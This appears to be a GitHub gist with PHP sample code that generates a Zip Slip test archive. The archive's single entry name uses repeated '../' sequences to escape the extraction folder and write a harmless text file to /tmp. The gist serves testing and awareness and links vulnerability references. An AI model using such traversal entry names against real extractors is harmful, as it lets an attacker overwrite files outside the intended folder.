Skip to content

Instantly share code, notes, and snippets.

@yidas
Last active August 7, 2021 17:38
Show Gist options
  • Save yidas/e6ce368f68f168148908dc2024777048 to your computer and use it in GitHub Desktop.
Save yidas/e6ce368f68f168148908dc2024777048 to your computer and use it in GitHub Desktop.
ZIP Slip - File Generation Sample Code by PHP

ZIP Slip - File Generation Sample Code by PHP

Sample Code

<?php

$zip = new ZipArchive();
$filename = "./zip-slip-test.zip";

if ($zip->open($filename, ZipArchive::CREATE)!==TRUE) {
    exit("cannot open <$filename>\n");
}

$zip->addFromString("../../../../../../../../tmp/zip-slip-test.txt" . time(), "ZIP Slip Testing.\n");
// $zip->addFile("." . "/to.php", "/testfromfile.php");
echo "numfiles: " . $zip->numFiles . "\n";
echo "status:" . $zip->status . "\n";
$zip->close();
?>

https://www.php.net/manual/en/class.ziparchive.php

ZipArchive::extractTo() has ZIP Slip protection already.

References

Zip Slip Vulnerability

NIST - CVE-2019-0191 Detail

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment